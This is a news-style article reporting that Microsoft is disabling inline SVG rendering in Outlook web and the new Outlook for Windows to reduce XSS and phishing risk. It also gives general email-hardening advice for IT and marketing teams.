Microsoft is rolling out a change to its email ecosystem: the web version of Outlook and the new Outlook for Windows will stop rendering inline SVG images. The phased rollout began in early September 2025 and is scheduled to complete by mid-October 2025. According to Microsoft, the change will affect fewer than 0.1% of all images sent through Outlook, suggesting negligible impact on typical business communications.
Why Microsoft is disabling inline SVG in Outlook: reducing XSS and filter evasion
SVG (Scalable Vector Graphics) is an XML-based format that can include scripts, external references, and interactive elements. When SVG is embedded directly in the HTML body of an email, inadequate sanitization can enable cross-site scripting (XSS) in the recipient’s mail client. Real-world consequences include session token theft, UI redressing, and stealthy phishing flows—without delivering traditional executables.
Threat actors have increasingly weaponized SVG to evade legacy detections. Security researchers observed a surge in SVG-laden phishing emails in late 2024, as adversaries used the format to bypass signature-based checks. Trustwave reported in April 2025 that SVG-driven phishing activity increased by 1,800% compared to April 2024 (Trustwave SpiderLabs). In late September 2025, Microsoft also documented a campaign leveraging LLM-generated SVG files to undermine mail protections (Microsoft Threat Intelligence).
What Outlook users will see—and what still works
Once enforcement takes effect, inline SVG will no longer render in the message body. Users will see empty spaces where those images would have appeared. However, SVG files sent as standard attachments remain supported and will be accessible from the attachments pane as usual. This approach narrows the attack surface in the highest-risk channel—inline, script-capable content—while preserving legitimate workflows involving vector graphics exchanged as files.
Part of Microsoft’s broader email-security hardening
The SVG decision aligns with Microsoft’s ongoing effort to minimize dangerous patterns in Office and Windows. In June 2025, Microsoft announced that the web version of Outlook and the new Outlook for Windows block .library-ms and .search-ms attachments, file types repeatedly abused in targeted attacks since at least mid-2022 (Microsoft 365 roadmap/message center). Microsoft maintains and regularly updates an official list of blocked file types for Outlook.
Operational guidance for IT and marketing teams
Replace inline SVG with safer formats. Use PNG or WebP for email body images. If vector fidelity is required, host assets on a trusted CDN with scripting disabled and sanitize any dynamic markup.
Harden mail defenses end-to-end. Tighten attachment and URL filtering, enforce domain authentication (DMARC, DKIM, SPF), and enable safe-link rewriting and time-of-click protections in secure email gateways.
Reinforce phishing awareness. Train users to scrutinize unexpected attachments or login prompts, especially those embedded in emails that appear legitimate at a glance.
Audit templates and landing pages. Review email templates and campaign assets for inline SVG dependencies. Provide fallbacks to ensure correct rendering in Outlook while maintaining brand consistency and accessibility.
Security impact and next steps
Blocking the rendering of inline SVG closes a commonly abused path for malicious script execution in the email body, complicating XSS and dynamic phishing techniques. While this does not eliminate all email-borne risks—links and other attachment types remain viable vectors—it materially reduces exposure in one of the most targeted layers of the attack chain. As deployment completes by mid-October 2025, legitimate communications should see minimal disruption and the overall security baseline for Outlook tenants should rise.
Organizations can maximize the benefit by pairing this control with layered defenses: modern anti-phishing policies, rigorous attachment and URL inspection, strict domain authentication, and ongoing user education. Transitioning away from inline SVG in marketing and transactional emails—and standardizing on safer image formats—will help preserve campaign performance without expanding the attack surface for adversaries.
